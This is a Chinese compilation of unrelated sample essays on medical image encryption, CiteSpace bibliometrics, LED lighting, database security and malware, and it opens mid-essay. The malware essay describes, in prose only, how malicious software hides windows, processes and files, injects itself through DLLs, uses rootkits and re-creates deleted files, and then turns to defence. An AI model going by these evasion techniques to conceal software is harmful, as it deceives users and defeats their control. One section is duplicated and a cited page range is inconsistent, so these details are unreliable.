对病人实行连续诊断,及时获取病情发展状况成为未来要实现的目标;同时,病人的隐私在图像传输过程中也增加了泄露和被攻击的风险,因此,在某种特定情况下对病人图像信息的传输需要进行加密保护。实现这一目标的关键技术就是安全性高、保密性强、延时短的图像加密通信系统。图像加密通信系统对病人的病情进行实时监护,并将病人的信息实时传回到医生的监控中心,使医生能够通过监控屏幕实时查看了解病人的具体情况,以能够及时做出正确的医疗诊断。目前数字图像的特点决定了其在存储传输时必定要占用较大的空间与带宽,再加上其需要处理的信息量大,这就进一步给图像的加密和通信带来了困难。而远程医疗更需要清楚的观测到病人的详细病情,就进一步加大了保密通信的难度。因此需要将图像压缩以及图像加密两个技术结合起来对数字图像的传输进行处理。图像加密是为了保证数字图像的安全,图像的压缩技术可以最大限度的减小占用的存储空间以便降低传输数据量。根据对原始图像进行压缩及加密处理过程不同,可将现有的数字图像加密通信分为三类。图像直接加密将数字图像直接加密一般是通过数字图像置乱技术直接对需要加密的数字图像进行置乱,随后再进行压缩编码和通信传输。这个方面的研究较早,相关论文也最多。例如,基于混沌的数据块加密算法将图像或视频数据先进行位置置乱,再进行像素值扩散,此算法具有较高的密钥敏感性和明文敏感性,使得加密后的数据具有均匀随机分布的特点。但是,这类方案只看重了图像的加密,没有将图像的压缩编码问题放在同样重要的位置上考虑。这样就随之而然的出现了两个严重影响通信效率及解密后的图像清晰度的问题。一是,需要加密的原始视频图像本身的数据占用空间就大,其进一步的加密计算便会消耗大量的资源与时间,这与实时性的要求有悖,况且目前的设备处理能力有限更难以达到图像传输的实时性要求,加重了通信的负担;二是,由于经过加密算法处理,使图像原来的相邻像素间的相关性有了变化,大量的增加了高频分量。使加密压缩后的视频图像的高频分量比低频分量的失真大得多,因此解密后的图像会有较大的失真。

首先通过现有的压缩算法对视频、图像进行压缩,之后再对压缩后的数据加密。加密的算法可更具需要采用安全性不同的算法。此方案的优点是具有较高的安全性;缺点是由于加密是在压缩后的数字图像数据上进行,便不再区分数据的重要性,因此数据加密的效果差、效率低而且数据也量大,使运算的设备负担也加重。选择性加选择性加密是在方案特点的基础上改进,在选择采用一定的压缩标准将视频图像压缩后,再对重要的数据进行着重加密。兼顾了数据的安全与传输的效率。目前,视频图像编码标准根据静态图像和动态图像来分主要分为静态图像的压缩标准和运动图像的压缩标准两种。动态图像的压缩标准主要有MPEG-1,MPEG-2,MPEG-4,H.263和H.264;静态图像的压缩标准主要有JPEG、JPEG2000。文献[4]采用小波置乱的方法来实现对JPEG2000的小波系数的实时加密。针对MPEG-2标准,文献[5]提出了对I帧加密的思路。针对H.264具有代表性的研究成果有Ahn提出的帧内预测模式加扰方法,该方法将所有I、P帧中的INTRA-4x4块和INTR_16×16块预测模式使用定长伪随机序列进行随机加扰,方法效率高但安全性较差。文献[6]提出了对熵编码过程进行加密的思路,但这种方案的实现比较复杂。

作者:李颖姝 李莹 单位:青岛市第五人民医院 青岛市电子政务与信息资源管理办公室

篇10

信息可视化(informaiton visualization,InfoVis或Iv)是近年来出现的数据挖掘方法之一,它能很好地利用人类对可视化形式下的模型和结构的获取能力,解决科技文献数据量过大、无法快速和有效交流的问题,同时可视化数据挖掘可观察、筛选、发现和理解信息,发现隐藏在数据和信息背后的含意[1]。

本文以开展基础研究为主,有重点地开展国家急需的、有重大战略需求的高技术创新研究,并与高新技术应用和转化工作相协调发展的多学科、综合性研究所――中国科学院化学所(以下简称化学所)作为研究机构的实例,以化学所近5年(2004-2008年)被科学引文索引数据库(SCIE)收录的国际论文为科研产出指标,利用SCIE分析功能,结合近年出现的信息可视化数据挖掘软件――citespace,对收录的科学文献全纪录数据进行统计和可视化分析。在传统的对相关信息文献计量分析的基础上,更加注重利用citespace软件对论文题目、摘要、关键词、标示符等数据提取词集,从引文数量、共现和共引的频次多方面进行聚类计算,发现隐藏在可视化数据背后的有价值情报。

1 方法与数据源

1.1 方法

采用美国Drexe1大学陈超美博士开发的基于JAVA平台的citespace在线可视化软件,该软件是一种适于多元、分时、动态的复杂网络分析的新一代信息可视化技术。使用citespace 的一般步骤:①确定一个研究领域或研究机构,收集尽可能多的文献;②收集数据, 包括题目、摘要、被引文献等信息的文献全纪录信息;③参数选择:确定总的时间段范围和时间分区;选择分析的节点类型;引文数量、共被引频次和共被引系数三个层次上分别设定阈值;选择算法精简和合并网络;④显示可视化图谱;确定关键点。

citespace可用于进行科学文献全记录数据共引网络分析,通过对文献信息的可视化,能够较为直观地识别研究机构科研产出发展态势的情报[2]。

1.2 数据源

选择美国科学情报研究所ISI(International for Scientific Information)创建的SCIE数据库为数据源,检索策略为:地址= inst chem* same (chin* aca* or acta*) same beijing),出版年=2004-2008,检索结果命中记录4 065条,引文数据138 586条,总被因频次为38 053次。将2004-2008年间化学所发表的4 065篇论文的作者、题目、主题词、关键词、文献的引文等全纪录信息导入citeSpace软件,采用SCIE的分析功能和citespace软件 ( 2009年3月20日2.2. R1 Webstart版本[3])进行年代分布、合作者、学科领域、合作机构、合作国家、期刊共引、作者共引信息分析,绘制网络可视化图谱。

2 化学所情况分析

2.1 年代分布

SCIE收录的2004-2008年间化学所的数量和论文被引频次分布结果如图1所示:

在2004-2008年5年间,化学所论文数量保持平稳增长,年均数量约800篇;但是5年间的被引频次从2004年的186次,猛增到2008年的12 805次,呈逐年大幅度增长的趋势,被引频次的提高表明化学所的质量有了显著的提高。通过SCIE引证检索结果的数据:化学所论文年平均被引频次达到6 604.67,篇平均被引频次为9.36,h指数为66,进一步反映化学所2004-008年5年在国际科学研究领域的影响力显著加强。

2.2 化学所论文合著者分布(co-authors network)

利用citespace软件对2004-2008年间化学所的合著者网络图谱进行分析,选择使用关键路径(pathfinder)算法,网络节点确定为作者,时间区选择为1年,阈值为(6,6,40),(8,8,40),(10,10,40)。图谱中不同大小和不同颜色的圆环组成的作者年轮来表示合著者频次(freq)和合著年份[4]。如图2、表1所示:

从图2、表1中可以清晰地看出,2004-2008年化学所的论文合著者中合著频次高于100次的有7人,其中,合著频次位于前5位的分别是:Zhu DB院士、Jiang L研究员、Han BX研究员、Liu YQ研究员和Li YL研究员。对论文合著者进行聚类分析,可以看出图谱可以聚为6大类,6大类中合著频次最高的作者分别是由Zhu DB院士、Jiang L研究员、Han BX研究员、Wan LJ所长、Wan LJ研究员和Li YF研究员,因此通过化学所论文合著者的网络图谱分析,可以清楚地了解化学所研究领域的学科带头人及其研究团队的分布。

2.3 化学所论文学科领域分布(co-occurring subject category )

利用citespace软件对1995-2008年化学所共现学科领域进行分析,选择使用关键路径算法,网络节点确定为学科领域,时间区选择为1年,阈值为(2,2,5),(3,3,5),(3,3,20)。图谱中不同大小和不同颜色的圆环组成的学科领域年轮表示学科领域的共现频次和共现年份,用不同颜色的连线来表示学科领域间共现的年代。如图3、表2所示:

从图3、表2中可以看出,在化学所论文共现学科领域中,共现频次大于20次的学科领域有16个,其中化学、聚合物科学、物理、材料科学、纳米科学及纳米技术位于与化学所共现学科领域的前5位。

2.4 与化学所共作者的机构分布(network of co-authors institutes)

利用citespace软件对2004-2008年与化学所共作者的机构网络图谱进行分析,选择使用关键路径算法,网络节点确定为机构,时间区选择为1年,阈值为(2,2,5),(3,3,5),(3,3,20)。图谱中不同大小和不同颜色的圆环组成的机构年轮来表示机构与化学所共作者频次和共作者年份。如图4、表3所示:

从图4、表3中可以看出,在与化学所共作者的机构中,中科院的节点(freq=3 718)远远大于其他机构,说明化学所与中科院内的共作者者频次最高。还可以看出共作者频次大于30次的机构有14个,其中北京大学、武汉大学、山东大学、清华大学、吉林大学位于与化学所国内共作者的前5位,值得注意的是德国Max Planck Inst Colloids & Interfaces的合作位居第10位,说明化学所与该机构的合作十分紧密。

2.5 与化学所共作者的国家分布(network of co-authors countries)

利用citespace软件对2004-2008年与化学所共作者的国家网络图谱进行分析,选择使用关键路径算法,网络节点确定为国家,时间区选择为1年,阈值为(2,2,3),(2,2,3),(3,3,5)。图谱中不同大小和不同颜色的圆环组成的国家年轮来表示国家与化学所的共作者频次和共作者年份。如图5、表4所示:

从图5、表4中可以看出,在与化学所共作者的国家中,中国的节点(freq=3 931)远远大于其他国家,说明化学所与国内共作者的频次最高。还可以看出与化学所共作者的频次大于10次的国家有9个,其中美国、德国、日本、加拿大、英国位于与化学所合作的前5位。

2.6化学所期刊共引分析(journal co-citation network)

利用citespace软件对2004-2008年化学所期刊共引进行分析,选择使用关键路径算法,网络节点确定为期刊,时间区选择为1年,阈值为(30,30,30),(30,30,30),(30,30,40)。图谱中不同大小和不同颜色的圆环组成的期刊年轮来表示期刊的共引频次和共引年份,用不同颜色的连线来表示期刊间共引的年代。如图6、表5和表6所示:

从图6、表5、表6中可以清晰地看出,目前化学所使用的核心期刊中有9种期刊的共引频次高于1 000,其中,期刊共引频次位于前5位的分别是:《科学》、《自然》、《物理化学杂志B》、《先进材料》、《化学评论》。尤其值得注意的是SCIE数据库中化学所发文量位于前5位的期刊分别是:《物理化学杂志B》、《应用聚合物科学》、《聚合物》、《大分子》、《兰格缪尔》,与期刊共引频次排在前5位的有所不同,因此,在关注学科领域核心期刊的时候,来源期刊发文量和共引频次排名居前列的期刊都应该是重点关注的期刊。通过化学所期刊共引网络图谱中期刊共引频次的分析,能够更快速、直观地了解化学所的核心期刊分布。

2.7 共词分析(network of co-occuring phrases)

利用citespace软件对2004-2008年化学所文献共词和突现词进行分析,选择使用关键路径算法,网络节点确定为关键词,时间区选择为1年,阈值为(10,10,20),(10,10,20),(10,10,20)。图谱中不同大小和不同颜色的圆环组成的年轮来表示关键词的共现频次和共现年份,用不同颜色的连线来表示关键词间共现的年代。最外层紫色圈突出显示表示共词中心性(centrality),即在整体网络中所起连接作用大小。软件还会根据某段时间内关键词共现频次,将变化率高的词从大量的主题词中探测出来,称为突现词,用红色字显示。如图7、表7所示:

从图7、表7中可以清晰地看出,化学所论文共现词,频次高于100的关键词有21个,其中被引频次位于前5位的分别是:聚合物(polymers)、形态学(morphology)、纳米粒子(nanoparticles)、膜(films)和衍生物(derivatives)。通过高频出现的关键词在共词网络图谱中展示的共现频次,在一定程度上揭示了化学所的热点研究方向。

3 小 结

本文通过绘制化学所的合作者、学科领域、合作机构、合作国家、期刊共引和文献共词的可视化图谱,以图谱方式揭示了化学所近5年发展过程中起关键作用的学科带头人、重点学科、核心期刊、研究热点等信息情报。目的在于通过研究机构文献计量的可视化分析方法,探索深度挖掘研究机构内部的重点学科领域分布、合作团队及学科领军人物、研究机构外部的合作研究机构及合作国家的分布以及研究机构的热点研究方向等情报的方法,在满足科研用户学术信息查找利用需求的同时,为研究所制定战略规划、提升国际竞争能力提供有价值的情报,从而进一步提升学科馆员融入研究所科研一线的知识化服务能力。

参考文献:

[1] Chaomei C.Searching for intellectual turning points:Progressive knowledge domain visualization.Proceedings of the National Academy of Sciences of the United States of America,Washington:US National Academy of Sciences,2004,101(Supp1.1):5303-5301.

[2] 刘则渊. 科学知识图谱:方法与应用. 北京:人民出版社,2008.

篇11

一、LED光源、灯具的优点及灵活性

(一)LED光源概述

LED,即半导体发光二级管,其单位体积小,在显示屏、交通讯号显示、汽车工业、建筑行业等方面获得广泛应用。LED光源在应用中,其功能性较强,发光效率高,光线质量强,且LED光源光色纯,光束集中,响应快,其艺术性较强;LED光源多采取低电压低电流驱动,功率因数接近1,耗能低,可以有效节约能源;LED光源内不含有有毒成分,废弃物可以有效回收利用,属于一种无污染光源,绿色环保,是21世纪必不可少的环保照明用品。一般低功率白光LED寿命在3万小时以上,高功率白光LED寿命在2万小时以上,彩色LED寿命则在5-10万小时范围内,其寿命长。综上,LED光源相对传统灯性能而言,其符合绿色环保要求,综合性能较好,具有较强的竞争优势。

(二)LED灯的“隐蔽”性

LED光源其单位体积较小,结构设计紧凑,应用方式灵活,能够在狭小空间范围内投光,便于隐藏,也可以组合应用多颗粒LED光源构成光源线或面或其他造型,美化景观及建筑环境,提高其艺术效果。LED灯的“隐藏”主要分为点式隐藏、带式隐藏与面式隐藏三种形式。其中点式隐藏为:于天棚设置灯槽并安装单个灯具,根据实际需要,选择多颗LED组合为大功率光源;带式隐藏:于天棚四周设置灯槽并安装LED条形射灯,通过多颗彩灯LED光源构成一列或多列,采取串联方式进行设置,由上而下照明;面式隐藏:一般建筑中,天棚、外墙面及地板为主要照亮发光面,应用LED光源,于窗户内沿或支架上设置线性发光条,营造出良好的装饰效果。

(三)LED灯与建筑一体化

在现代建筑照明设计中应用LED,可以实现建筑与照明一体化,要求协调建筑空间、建筑构件与灯具等因素,合理协调组织,相互促进,应用科学措施解决存在问题。LED灯与建筑一体化中,其中大面积显示屏应用效果尤为突出。当前,LED形状大多表现为圆形,其呈现外观多为圆形排列构成,与外包壳结合形成视觉造型。LED灯与建筑构件相结合,在照明设计中应综合考虑灯具与建筑构件和谐性与艺术性。LED灯本身存在着装饰性,可以在中空管线中形成线性发光条或发光带,在建筑立面构件中设置于夜景装饰部位,从而形成与建筑为一体的线性发光条。

二、LED照明在多设计领域中的应用

(一)LED室内照明设计

建筑室内环境照明应综合考虑设计目标,合理应用技术措施及艺术手段,对室内设计环境及空间等因素进行充分分析,应用创造性思维,打造出符合工作、生活、生产功能需求,满足人们心理及生理要求的室内照明环境。在建筑室内进行照明设计时,应遵循以下原则:从视角角度,要求室内照明设计可见度较好,保证其照度合适,亮度分布均匀,避免出现眩光;从心理角度,要求室内照明设计氛围符合环境功能要求。

(二)LED室外照明设计

室外照明在提高城市活力,保障夜间车辆通行安全及效率,保障行人安全等方面发挥着重要的现实意义,室外照明延展了人们的夜间生活时光,丰富了城市居民休闲及娱乐活动。建筑室外照明设计,是通过灯光照明塑造景观效果。人们对建筑室外照明需求可以分为基本需求、感官信息需求及精神审美需求三个方面,按照人们的需求不同,可以将室外照明划分为安全照明、功能照明与景观照明三种类型。其中安全照明与功能照明属于基础性照明,景观照明侧重满足人们的精神需求,给人带来精神上的享受。

1.道路照明设计中LED的应用

进行道路照明设计,其目的主要在于:保障车辆行驶安全;方便行人辨别方向、识别障碍物,提供安全感;改善夜间环境。道路照明设计为夜间车辆及人员提供安全舒适的光环境。考虑到道路照明持续性及其能源消耗较大,为此,在道路照明设计中应用LED,可以有效节约能源,保护环境,提高城市形象。城市道路照明规划设计应建立于城市发展规划的基础上,并综合考虑电力规范,保障道路设计的科学合理性,能够有效的减少资源浪费。

LED城市道路照明设计主要内容为:按照道路级别、交通密度、交通控制措施、城市规模及是否为旅游城市等合理选择照明标准值;在道路照明设计中考虑诱导性因素,如道路灯杆、灯具、中心线等属于视觉诱导性因素,照明灯光、光源色及排列等为光学诱导性因素,确保道路照明设计其诱导性良好;为驾驶人员提供良好的视觉舒适感与可见度;安好道路级别与道路周边环境合理选择光源。

2.建筑外观照明设计中LED应用

建筑外观照明属于城市规划与城市建设的重要部分,其照亮建筑物的方式主要分为泛光照明与内透光照明两种方式。其中LED泛光照明即立面照明,属于一种应用较为广泛的建筑外部装饰照明方式,如国际著名景点埃菲尔铁塔、巴黎圣母院、凯旋门等建筑均采取泛光照明方式。LED投光灯光色好,立体性较强,其艺术效果较明显。LED透射式照明,以其功能特点为标准可以分为装饰性透射与功能性透射两种形式。上海金茂大厦就是采取内透照明方式,让整个建筑通透,提高了建筑外观效果,且便于维修,综合效益良好。

3.景观照明设计中LED应用

景观照明结合了自然及美学,是对夜间景观环境的二次艺术性创造,可以营造出抒情的生活环境,改善人们生活质量。LED光源其柔和光色在景观照明设计应用中艺术效果十分突出,不仅可以为人们提供良好的视觉环境,还可以有效协调光色,增强景观艺术美感,陶冶情操,满足人们审美需求、心理需求。如在庭院灯光小品中应用LED,采取柔和的颜色,产生视觉享受,丰富情感。

三、结语

LED光源单位体积小,功能性、艺术性,且绿色节能,因其有突出的特性,在照明市场中占有重要地位,逐渐在各领域得到广泛应用。在现代照明设计中应用LED,其综合效益突出。本文在概述LED光源的基础上,重点对LED在照明设计中的应用进行研究。LED在照明设计中分为点式隐藏、带式隐藏与面式隐藏三种隐藏方式,将LED灯与建筑一体化,能够有效提高照明效果,并从室内与室外两个角度,对LED在现代建筑设计中的应用进行分析。实践证明,LED光源在照明设计中应用效果突出,综合效益良好,未来应用前景广阔。

参考文献:

[1]袁景玉,唐春娥.建筑化LED照明设计流程与策略分析[J].城市建设理论研究(电子版),2011,(34).

[2]李玲英.浅谈发光二极管在建筑照明设计中的应用[J].城市建设,2010,(27):113-114.

[3]叶威.论大功率LED照明设计工作的技术要点[J].商品与质量・建筑与发展,2013,(7):464-464.

篇12

在应用数据库时,有一个验证程序,针对全部用户,即鉴别使用用户的身份。在端口计算机和访问计算机的身份鉴别中要使用身份鉴别。当我们想要使用计算机时,用户需要连接相应的HTTP和SSH,输入用户名和密码,来鉴别用户的身份。使用的人需要严格保守密码,同时存留在对应的服务器上。将编程技术运用到计算机数据的使用和建立中,能够实现企业关联数据和内部文件的安全管理,以免由于企业信息泄露,给企业造成经济损失。

(二)可用性

将编程技术运用到数据库系统中,其可用性十分强。成功解决不均衡的负载和一些数据库中的故障等问题是对可用性的要求。当计算机的主接口出现了问题,留作备用的接口将会自动替代问题接口进行工作,这样可以使其他故障不对其产生作用,保证网络在工作过程中的持续稳定性。另外,接收大量的网络数据时,主接口就可以在备用接口的帮助下,完成数据的接收和传输工作,确保计算机能够正常运作。

(三)隐藏信息的特性

在进行通讯连接时,由于计算机中NAT技术的作用,内部网络中的网址会被隐藏,此时显示在数据中的结果是通过公共网络网址进行访问的,这就是编程技术的隐藏性。换句话说,企业的平常管理工作中,用户可以使用计算机直接访问外部网络,然而对企业内部网络的搜索和查看,这些是外部网络无法实现的,成功实现了安全管理及保密企业信息。

二、计算机软件工程的数据库编程技术

(一)设计、开发编程技术

数据库正式投入使用后,需要随时关注系统的运作情况,在系统运行的过程中,尽早发现没有处理的问题并进行分析。所以,就要折返到编程阶段,尽早处理在编程阶段没有处理的问题,完善优化数据存储系统。与此同时,运用不同的编程技术来应对不同的软件应用,根据各种软件应用的不同特性,采取不一样的编程技术,对软件运用中有待处理的问题进行分析,保证软件可以平稳的运作,而且还能够合理化的运用系统资源,假若一部分数据出现传输问题,也能够运用编程技术将出现问题的部分进行调整。

(二)加密数据库文件

当今社会,信息化高速发展,在聊天记录、网络搜索中都存在大量的个人隐私,人们对个人隐私的重视度也逐渐提高,而计算机数据库作为专门存储网络信息的工具,其保密性能的高低,直接关系到人们生活、工作中的信息安全问题。一方面,要分析数据库中存储的基本信息,并加上基本的保护在其中的隐私类消息上,一旦有信息外漏的情况产生,编程师就要及时通过编程的方式处理这个问题,经过编程,加密保护数据库中的文件。在实行加密保护的同时,还要与计算机软件工程的现实情况进行结合,从而充分发挥加密保护的作用;另一方面,加密保护的功能还可以进一步更深层次的设计,将加密保护分成几个层级,以满足不同用户的要求,同时每个用户都可以设置自己的专用登录密码,然后系统编程会确认登录密码的正确与否,并根据对应的密钥,实现深层次加密信息;最后,在数据库编程时,由于信息不同的选择造成各系统间的冲突,能够运用系统间的优化体系,优化处理产生的问题。

(三)设计存储模式

如今的生活中,由于计算机的使用越来越普遍,数据库技术就要保护更多的网络信息数据。一方面,软件系统的设计要以软件功能系统的选取为重点,也可以将其他工程项目设计过程中的理念运用其中,优化设计方案,从而使设计出的数据库能够更加稳定的运行;另一方面,在数据库进行实际存储时,可以将各类信息进行分类存储,方便人们二次使用数据。最后,将优化的数据系统运用到数据库存储模式中,在数据库开始使用后,可以将产生的问题尽早优化,同时还能够将没有解决的问题尽早发现,以使数据库的存储更加方便用户使用。

三、结语

由此可见,将数据库编程技术分析工作做好,意义十分重大。这对于计算机数据库实际应用的提高十分有利,可以扩大编程技术的运用优势,在国家信息化发展方面,提供更多的技术方面支持。所以,基于计算机软件工程的数据库编程技术在今后的计算机研究工作中应予以更多的重视,并科学的评测此类技术的实际运用效果,用以增加适用范围,使其在国家经济社会的发展中发挥作用。

软件工程硕士论文参考文献:

[1]张学立,田林琳.基于计算机软件工程的数据库编程技术浅谈[J].时代农机,2018,45(11):163.

篇13

恶意软件是介于病毒和正规软件之间的软件,具备正常功能(下载、媒体播放等)和恶意行为(弹广告、开后门)等,既有一定的实用价值,也会给用户带来种种干扰。这些程序未经用户许强行潜伏到用户电脑中,而且此类程序无卸载程序,无法正常卸载和删除,强行删除后还会自动生成。此外,像广告程序会强迫用户接受阅读广告信息,间谍软件搜集用敏感信息并向外发送,严重侵犯了用户的选择权和知情权。在最近几年,产生了以下几种主要的恶意软件:

(一)广告软件(Adware)

广告软件是指未经用户允许,下载并安装在用户电脑上;或与其他软件捆绑,通过弹出式广告等形式牟取商业利益的程序。此类软件往往会强制安装并无法卸载;在后台收集用户信息牟利,危及用户隐私;频繁弹出广告,消耗系统资源,使其运行变慢等。例如:用户安装了某下载软件后,会一直弹出带有广告内容的窗口,干扰正常使用。还有一些软件安装后,会在IE浏览器的工具栏位置添加与其功能不相干的广告图标,普通用户很难清除。

(二)间谍软件(Spyware)

间谍软件是一种能够在用户不知情的情况下,在其电脑上安装后门、收集用户信息的软件。用户的隐私数据和重要信息会被“后门程序”捕获,并被发送给黑客、商业公司等。这些“后门程序”甚至能使用户的电脑被远程操纵,组成庞大的“僵尸网络”,这是目前网络安全的重要隐患之一。例如:某些软件会获取用户的软硬件配置,并发送出去用于商业目的。

(三)浏览器劫持

浏览器劫持是一种恶意程序,通过浏览器插件、BHO(浏览器辅助对象)、Winsock LSP等形式对用户的浏览器进行篡改,使用户的浏览器配置不正常,被强行引导到商业网站。用户在浏览网站时会被强行安装此类插件,普通用户根本无法将其卸载,被劫持后,用户只要上网就会被强行引导到其指定的网站,严重影响正常上网浏览。例如:一些不良站点会频繁弹出安装窗口,迫使用户安装某浏览器插件,甚至根本不征求用户意见,利用系统漏洞在后台强制安装到用户电脑中。这种插件还采用了不规范的软件编写技术(此技术通常被病毒使用)来逃避用户卸载,往往会造成浏览器错误、系统异常重启等。

(四)行为记录软件(Track Ware)

行为记录软件是指未经用户许可,窃取并分析用户隐私数据,记录用户电脑使用习惯、网络浏览习惯等个人行为的软件。危及用户隐私,可能被黑客利用来进行网络诈骗。例如:一些软件会在后台记录用户访问过的网站并加以分析,有的甚至会发送给专门的商业公司或机构,此类机构会据此窥测用户的爱好,并进行相应的广告推广或商业活动

(五)恶意共享软件(malicious shareware)

恶意共享软件是指某些共享软件为了获取利益,采用诱骗手段、试用陷阱等方式强迫用户注册,或在软件体内捆绑各类恶意插件,未经允许即将其安装到用户机器里。使用“试用陷阱”强迫用户进行注册,否则可能会丢失个人资料等数据。软件集成的插件可能会造成用户浏览器被劫持、隐私被窃取等。例如:用户安装某款媒体播放软件后,会被强迫安装与播放功能毫不相干的软件(搜索插件、下载软件)而不给出明确提示;并且用户卸载播放器软件时不会自动卸载这些附加安装的软件。

(六)行为记录软件(track ware)

行为记录软件是指未经用户许可,窃取并分析用户隐私数据,记录用户电脑使用习惯、网络浏览习惯等个人行为的软件。行为记录软件危及用户隐私,可能被黑客利用来进行网络诈骗。例如,一些软件会在后台记录用户访问过的网站并加以分析,有的甚至会发送给专门的商业公司或机构,此类机构会据此窥测用户的爱好,并进行相应的广告推广或商业活动。

(七)恶作剧程序

恶作剧程序通常都是执行程序,本身没有过激危害,但影响正常工作的一类程序。恶作剧程序改变系统中部分文件的编码格式,运行没有任何提示,支持文件改名,支持文件合并器。恶作剧程序如果不是刻意散播,通常没有自我散播能力。例如,“涂改者234496”(Win32.Troj.Hider.i.234496)

这是一个恶作剧程序,复制自身到系统目录,设置自身为系统隐藏文件,并通过添加到系统服务方式随系统启动。该程序会修改系统文件夹选项中的“显示隐藏文件”部分来保护自身,并且修改exe文件的关联方式。

归纳起来,恶意软件有两大特点:一是编写病毒化。不少恶意软件为了防止被杀毒软件或恶意软件卸载工具发现,采用了病毒常用的Rootkit技术进行自我保护。Rootkit可以对自身及指定的文件进行隐藏或锁定,防止被发现和删除。更有一些恶意软件,采用“自杀式”技术攻击杀毒软件。一旦发现用户安装或运行杀毒软件,便运行恶意代码,直接造成计算机死机、蓝屏,让用户误以为是杀毒软件存在问题。二是传播病毒化。为了达到更好的传播效果,并减小成本,不少中小厂商直接使用病毒进行“恶意推广”。用户的计算机感染病毒后,病毒会自动在后台运行,下载并安装恶意软件。同时,恶意软件安装后也会去从互联网自动下载运行病毒。大量的恶意软件开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等,这些行为严重危害到用户的信息安全和利益。恶意软件和病毒之间的界限已变得越来越模糊。随着恶意软件不断朝着病毒的方向发展,要想彻底杀灭恶意软件就必须采用反病毒技术。

二、恶意软件的技术分析

长期以来,人们设计计算机的目标主要是追求信息处理功能的提高和生产成本的降低,而对于安全问题则重视不够。计算机系统的各个组成部分,接口界面,各个层次的相互转换,都存在着不少漏洞和薄弱环节。硬件设计缺乏整体安全性考虑,软件方面也更易存在隐患和潜在威胁。对计算机系统的测试,目前尚缺乏自动化检测工具和系统软件的完整检验手段,计算机系统的脆弱性,为恶意软件的产生和传播提供了可乘之机;全球万维网(www)使“地球一村化”,为恶意软件创造了实施的空间;新的计算机技术在电子系统中不断应用,为恶意软件的实现提供了客观条件。实施恶意软件入侵的技术是五花八门,用好了可以伸张正义,用歪了却成为罪恶的帮凶。

(一)隐藏技术

隐藏是流氓软件的天性,也是病毒的一个特征,任何流氓软件都希望在用户的电脑中隐藏起来不被发现,由于隐藏的目的,衍生出隐藏的技术。可能的途径有:①窗口隐藏。恶意软件的目的就是不想为人所知,因此它们在运行的过程会将自己的程序窗口的属性设为“不可见”,这样用户就看不到程序的窗口了。②进程隐藏。恶意软件通过调用微软的一个未公开函数,将本身注册为服务,这样系统的任务管理器就无法显示这类程序的进程了,从而达到了隐藏自己的目的。③文件隐藏。恶意软件在安装时将自身拷贝到系统目录,然后将文件的属性设置为隐藏,这样,用户如果采用的是默认系统设置,

则就无法看到他们。

(二)线程插入技术

线程是Windows系统为程序提供的并行处理机制,它允许一个程序在同一时间建立不同的线程,完成不同的操作。另外,由于Windows操作系统为了提高软件的复用性,减少重复开发的开销,采用了动态链接库机制,即将一些公用的程序放在DLL文件中,程序不用包括这些代码,只要在运行时对这些DLL文件直接进行调用就可以完成各种功能,而恶意软件正是利用了这一点。他们的可执行程序并不是EXE形式的,而是DLL形式,这类文件一般是存在于系统中,由可执行程序进行调用。

(三)RootKit技术

有些恶意软件绕过操作系统的API调用,直接利用更底层的调用,然后接管系统的高级API调用,当有程序试图查找它们时,便返回假信息,从而得以保护自己的技术。

(四)关联技术

①文件关联。恶意软件在进入用户系统的同时,在系统的不同地方产生多个相同或不同的相关联文件,一旦一个文件被删除了,另一个文件就会重新将这个文件恢复。②注册表关联。恶意软件在用户系统发作的时候,修改注册表,在run、winlogon、appinst等注册项中添加相关联键值。③网络关联。

三、恶意软件防范的对策和方法

(一)建立安全的防护体系意识

防范恶意软件的第一步,就是要有安全的多层意识,一是数据层;二是应用程序层;三是主机层;四是内部网络层;五是网络层;六是物理安全层;七是策略、过程和意识层。将安全的多层意识作用在计算机网络体系中,我们就可以逐层进行分析、进行有效的防范。

(二)安装防护软件和清除工具

防护软件和清除工具是查找和清除恶意软件的辅助手段。比如Grisoft公司出品的AVG Anti-Spyware是一款致力于确保数据安全,保护您的隐私,抵御间谍软件,广告软件,木马,拨号程序,键盘记录程序和蠕虫的威胁的防护软件,它的恶意软件查杀能力根据微软官方网站杀毒评测居世界第4位。

(三)软件产品的安全原则

软件开发商为了保证用户安全,软件产品的编写与设计应满足以下原则:用户可控制原则;用户环境安全原则;用户可操作原则;用户可移除原则;安装提示原则。

总的来说,恶意软件重在防范,大家只要对它有着警惕性,有着安全的上网意识,恶意软件即使长盛不衰,也不会对我们的工作、生活带来多大影响。要有不要轻易登陆不了解的网站,因为这样很有可能会中网页脚本病毒,从而使系统中上恶意软件。不要随便下载不熟 悉的软件,如果用户不了解这些软件,当这些软件中捆绑一些恶意软件时,用户也无法察觉。安装软件时应仔细阅读软件附带的用户协议及使用说明,有些软件在安装的过程中会以不引起用户注意的方式提示用户要安装恶意软件,这时如果用户不认真看提示的话,就会安装上恶意软件。

参考文献:

[1]黑客的攻击手段及用户对策》余建斌, 北京人民邮电出版社1998. .

相关精选